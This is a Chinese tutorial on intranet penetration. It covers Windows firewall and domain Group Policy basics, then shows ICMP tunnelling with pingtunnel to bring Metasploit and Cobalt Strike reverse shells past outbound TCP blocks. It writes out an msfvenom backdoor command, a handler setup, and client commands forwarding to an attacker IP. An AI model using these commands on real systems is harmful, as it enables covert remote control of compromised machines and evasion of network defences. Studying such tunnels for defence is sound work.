目錄
防火墻必備知識
域控-防火墻組策略對象同步
域控 - 防火墻組策略不出網(wǎng)上線
MSF上線
CS - ICMP上線
注意:隧道技術(shù)是后滲透手段,是在已經(jīng)取得權(quán)限后的手段
域控-組策略同步
防火墻必備知識
學習防火墻的目標是知道了解防火墻的一些常見配置對內(nèi)網(wǎng)滲透的影響,并不需要像運維一樣全面了解防火墻
參考資料:Windows防火墻限制端口/IP/應用訪問的方法以及例外的配置
這是阿里云關(guān)于windows運維的文檔,里面有常見的winodws防火墻配置?
防火墻(Firewall)是一種網(wǎng)絡安全設備或軟件,用于監(jiān)控和控制網(wǎng)絡流量,以保護計算機和網(wǎng)絡免受未經(jīng)授權(quán)的訪問、惡意攻擊和網(wǎng)絡威脅。防火墻通過建立規(guī)則和過濾器來管理進出網(wǎng)絡的數(shù)據(jù)流,以確保只有授權(quán)的數(shù)據(jù)能夠通過。
防火墻的主要功能包括:
- 包過濾:防火墻檢查傳入和傳出網(wǎng)絡的數(shù)據(jù)包,并根據(jù)預定義的規(guī)則集來決定是否允許通過。這些規(guī)則基于源IP地址、目標IP地址、端口號、協(xié)議類型等來過濾數(shù)據(jù)包。
- 狀態(tài)檢測:防火墻可以追蹤網(wǎng)絡連接的狀態(tài),并僅允許與已建立連接相關(guān)的響應數(shù)據(jù)包通過。這有助于防止未經(jīng)授權(quán)的外部主機訪問內(nèi)部網(wǎng)絡。
- 網(wǎng)絡地址轉(zhuǎn)換(NAT):防火墻可以執(zhí)行網(wǎng)絡地址轉(zhuǎn)換,將內(nèi)部私有IP地址轉(zhuǎn)換為公共IP地址,以增強網(wǎng)絡安全和隱私。
- 應用程序過濾:一些高級防火墻還可以檢查數(shù)據(jù)包中的應用層信息,例如應用程序協(xié)議、有效載荷內(nèi)容等,以便更精確地控制應用程序級別的訪問和流量。
- 虛擬專用網(wǎng)絡(VPN)支持:一些防火墻具有VPN功能,可以提供安全的遠程訪問和加密通信,使遠程用戶能夠安全地連接到內(nèi)部網(wǎng)絡。
通過配置適當?shù)姆阑饓σ?guī)則和策略,可以有效保護計算機和網(wǎng)絡免受來自互聯(lián)網(wǎng)和其他網(wǎng)絡的潛在威脅。防火墻通常被廣泛用于企業(yè)網(wǎng)絡和個人計算機,作為網(wǎng)絡安全的重要組成部分。
關(guān)于出站,入站規(guī)則:這個出站,入站是針對服務而言的。對于一個Web站點,配置入站規(guī)則就是檢測訪問我們的流量,出站規(guī)則就是檢測本機出去的流量。
防火墻根據(jù)用戶不同網(wǎng)絡環(huán)境有不同的防火墻。比如:
- 主機在域內(nèi)的規(guī)則配置
- 主機對某個目標的規(guī)則配置
- 主機對公網(wǎng)的規(guī)則配置
在生活中,我們可以運行某個執(zhí)行程序,系統(tǒng)會提示我們是否允許該應用訪問公網(wǎng)網(wǎng)絡。
還可以根據(jù)具體的協(xié)議,端口進行規(guī)則設置
?還可以針對具體的協(xié)議進行出入站限制
有些破解軟件的重要一步就是防止軟件與外部網(wǎng)絡進行連接,就會將該程序的出入站規(guī)則全部禁用。
域控-防火墻組策略對象同步
在域中,可以通過組策略對域內(nèi)所有設備進行配置防火墻規(guī)則
新建一個策略進行編輯
?這下圖進行配置
配置規(guī)則
強制執(zhí)行
域內(nèi)服務器也可使用命令更新:
gpupdate/force
域成員強制同步DC域防火墻策略
域控 - 防火墻組策略不出網(wǎng)上線
背景介紹:域控通過組策略設置防火墻規(guī)則同步后,域內(nèi)用戶主機被限制TCP出網(wǎng),其中規(guī)則為出站規(guī)則
你可以Ping通百度,但無法訪問百度網(wǎng)頁。兩個協(xié)議不一樣!
思路:正向連接&隧道技術(shù)
如果是入站被限制呢?反向連接&隧道技術(shù)也可以解決
這里將會以ICMP協(xié)議為例,ICMP協(xié)議是Ping命令走的協(xié)議
項目地址:
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel
這里我們實驗是模擬DC禁用域成員主機TCP
實戰(zhàn)中,TCP封殺的策略:
主機出站TCP封殺 入站無法鏈接外網(wǎng)
- 采用正向連接:取得一臺有網(wǎng)絡的能和主機通訊的服務器權(quán)限(能連外網(wǎng))
- 把數(shù)據(jù)給能出網(wǎng)的機器,通過這臺機器進行正向鏈接控制它
主機出站TCP封殺 入站可以鏈接外網(wǎng)
- 采用正向連接
- 或者隧道技術(shù):走其它協(xié)議出網(wǎng)
這里的實驗是把TCP的數(shù)據(jù)封裝到ICMP協(xié)議里帶出來。因為目標ICMP未被禁止。ICMP隧道技術(shù),在目標服務器中開啟腳本負責將后門的TCP流量轉(zhuǎn)入到ICMP協(xié)議中,kali中開啟腳本負責監(jiān)聽和接受信息
隧道技術(shù)對比代理技術(shù):
隧道技術(shù):解決不出網(wǎng)協(xié)議上線的問題,利用可出網(wǎng)協(xié)議封裝
代理技術(shù):解決網(wǎng)絡通訊不通的問題,利用跳板機建立節(jié)點
這兩種操作是已經(jīng)取得該目標的system權(quán)限后,為了把權(quán)限移交出來而使用的,實現(xiàn)持久化控制。
MSF上線
MSF生成后門:
注意這里是127.0.0.1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4455 -f exe > msf.exe
將TCP的流量發(fā)送到自己的4455端口
MSF啟動監(jiān)聽:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
啟動工具,它的作用是把發(fā)送ICMP流量還原位TCP流量再被MSF接收?
./pingtunnel -type server 需要在目標主機上執(zhí)行 需要高權(quán)限
目標機器上啟動工具,執(zhí)行下面命令:
pingtunnel.exe -type client -l 127.0.0.1:4455 -s 47.94.xx.xx -t 47.94.xx.xx:4444 -tcp 1 -noprint 1 -nolog 1
它可以把本地3333端口接收的TCP流量封裝到ICMP協(xié)議里面,轉(zhuǎn)發(fā)個MSF所在主機。
上線?。?!
CS - ICMP上線
配置第一個監(jiān)聽器:
使用這個監(jiān)聽器生成后門
這個后門設置的原因和上面MSF是一樣的,不再贅述。
生成第一個監(jiān)聽器
?用來接收反彈
攻擊機上運行:
./pingtunnel -type server
被攻擊機上運行:
pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1
之后會在第二個監(jiān)聽器上接收到連接
注意:隧道技術(shù)是后滲透手段,是在已經(jīng)取得權(quán)限后的手段
域控-組策略同步
域控進行了設置,所有的域內(nèi)機器都要受到影響,委派下發(fā)
軟件安裝,密碼更改等等
比如:給域內(nèi)主機設置同一壁紙
壁紙所在目錄設置共享
域內(nèi)主機都能看到
完成設置,查看效果:文章來源:http://www.zghlxwxcb.cn/news/detail-467646.html
文章來源地址http://www.zghlxwxcb.cn/news/detail-467646.html
到了這里,關(guān)于內(nèi)網(wǎng)安全:初探隧道技術(shù)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!